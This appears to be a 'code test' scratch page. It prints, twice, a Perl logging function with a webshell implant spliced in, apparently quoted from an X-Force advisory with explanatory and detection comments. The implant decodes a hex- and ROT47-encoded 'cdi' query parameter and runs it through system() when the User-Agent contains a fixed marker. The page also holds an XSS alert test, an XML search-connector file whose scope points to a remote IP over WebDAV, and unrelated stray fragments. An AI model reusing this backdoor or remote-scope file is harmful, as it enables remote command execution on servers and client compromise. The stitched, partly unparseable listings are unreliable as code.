code test
# Msg: logging wrapper, shown here with an implant spliced into its body (the
# dash-delimited marker lines bracket the inserted statements).
#
# Legitimate part: takes ($event, $level, $data), asks caller() for the calling
# file and line, trims the path to its basename, doubles every '%' in $data and
# hands the result to Msg_impl.
#
# Implanted part: sits ahead of the logging code, so it is evaluated on every
# call to Msg. It turns a web request into command execution when the request
# carries a fixed User-Agent marker and a "cdi" query parameter.
#
# Detection notes: search web logs for the marker string in the User-Agent and
# for query strings whose second parameter is named cdi; compare the file that
# defines Msg against a known-good copy.
#
# NOTE(review): as printed, this listing is not valid Perl. The marker lines
# and the typographic quotes look like page annotations and rendering, not
# part of the original file.
sub Msg {
my ($event, $level, $data) = @_;
my ($pkg, $file, $line) = caller;
— start of webshell code —
# Both values come straight from the request (CGI environment) and are
# attacker-controlled.
my $ua = $ENV{HTTP_USER_AGENT};
my $req = $ENV{QUERY_STRING};
# Fixed 40-hex-character marker that gates the implant; usable as a search
# string wherever User-Agent values are logged.
my $qur = “3f4a8724ab807b4f4f167aa95599d5b25e2c8aa6”;
# Query string split on '&'; only the second field ($param[1]) is looked at.
my @param = split(/&/, $req);
# Gate 1: the marker may appear anywhere inside the User-Agent.
if (index($ua, $qur) != -1) {
if ($param[1]){
# Second field split into name and value on '='.
my @res = split(/=/, $param[1]);
# Gate 2: the parameter name must be exactly "cdi".
if ($res[0] eq “cdi”){
# Every pair of hex digits in the value is replaced by the byte it encodes.
$res[1] =~ s/([a-fA-F0-9][a-fA-F0-9])/chr(hex($1))/eg;
# Printable ASCII '!'..'~' rotated by 47 positions (ROT47); presumably keeps
# the command from appearing in clear text in request logs.
$res[1] =~ tr/!-~/P-~!-O/;
# Single-argument system(): the decoded string runs as a command, through the
# shell when it contains shell metacharacters. No output is captured here.
system(${res[1]});
}
}
}
— end of webshell code —
# Keep only the basename of the caller's file.
$file = substr ($file, rindex ($file, “/”)+1);
# Prevent C printf format codes to make it through…
$data =~ s/%/%%/g;
Msg_impl ($file, $line, $event, $level, $data);
}
Using X-Force code snippet:
<code>sub Msg {
# Logging wrapper with an implant between the two marker lines below.
# The wrapper itself reads ($event, $level, $data), takes file and line from
# caller(), reduces the file to its basename, escapes '%' in $data and calls
# Msg_impl. The implant is evaluated first, on every call.
# NOTE(review): the marker lines and typographic quotes make this listing
# invalid Perl as printed; they appear to come from the page, not the file.
my ($event, $level, $data) = @_;
my ($pkg, $file, $line) = caller;
— start of webshell code —
# Request data from the CGI environment; both are attacker-controlled.
my $ua = $ENV{HTTP_USER_AGENT};
my $req = $ENV{QUERY_STRING};
# Hard-coded 40-hex-character marker expected inside the User-Agent.
my $qur = “3f4a8724ab807b4f4f167aa95599d5b25e2c8aa6”;
# Fields of the query string; only index 1 (the second field) is used.
my @param = split(/&/, $req);
# Continue only when the User-Agent contains the marker as a substring.
if (index($ua, $qur) != -1) {
if ($param[1]){
# name=value split of the second field.
my @res = split(/=/, $param[1]);
# Only a parameter named "cdi" is acted on.
if ($res[0] eq “cdi”){
# Hex-decode: each two-hex-digit pair becomes one character.
$res[1] =~ s/([a-fA-F0-9][a-fA-F0-9])/chr(hex($1))/eg;
# ROT47 over '!'..'~' (the two halves of the range are swapped).
$res[1] =~ tr/!-~/P-~!-O/;
# The decoded value is executed with single-argument system(), which goes
# through the shell when metacharacters are present. A request with the
# marker in its User-Agent and a hex-only cdi value is the pattern to hunt for.
system(${res[1]});
}
}
}
— end of webshell code —
# Strip the directory part of the caller's file name.
$file = substr ($file, rindex ($file, “/”)+1);
# Prevent C printf format codes to make it through…
$data =~ s/%/%%/g;
Msg_impl ($file, $line, $event, $level, $data);
}</code>
Another:
<script>alert(“hi”)</script>
Tester:
<?xml version=”1.0″?>
<!-- persistedQuery document: a stored query with view settings (viewInfo), a kind filter and a search scope.
     The security-relevant element is the scope's include path, which names a remote host instead of a local folder.
     NOTE(review): the typographic quotes appear to come from page rendering; the file would not parse as shown. -->
<persistedQuery version=”1.0″>
<viewInfo viewMode=”icons” iconSize=”256″ stackIconSize=”0″ displayName=”Documents” autoListFlags=”0″>
<visibleColumns>
<column viewField=”System.ItemNameDisplay”/>
</visibleColumns>
<sortList>
<sort viewField=”System.ItemNameDisplay” direction=”ascending”/>
</sortList>
</viewInfo>
<query>
<kindList>
<kind name=”item”/>
</kindList>
<scope>
<!-- UNC-style path to a remote IP address (defanged with [.] on this page). The "@80" suffix is the Windows
     notation for reaching a share over WebDAV on port 80. Presumably, resolving this scope makes the client
     connect to that host, so outbound connections to the address are worth hunting for; confirm against the
     original sample. -->
<include path=”::{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\\148.252.42[.]42@80\documents\Tender” attributes=”1887437183″/>
</scope>
</query>
<properties>
<author Type=”string”>user</author>
</properties> </persistedQuery>
cmd.exe
char()
varchar()
(hex($1))
<p style=”font-family:courier;”>This is a paragraph.</p>
<p style=”background-color:Tomato;”>Lorem ipsum…</p>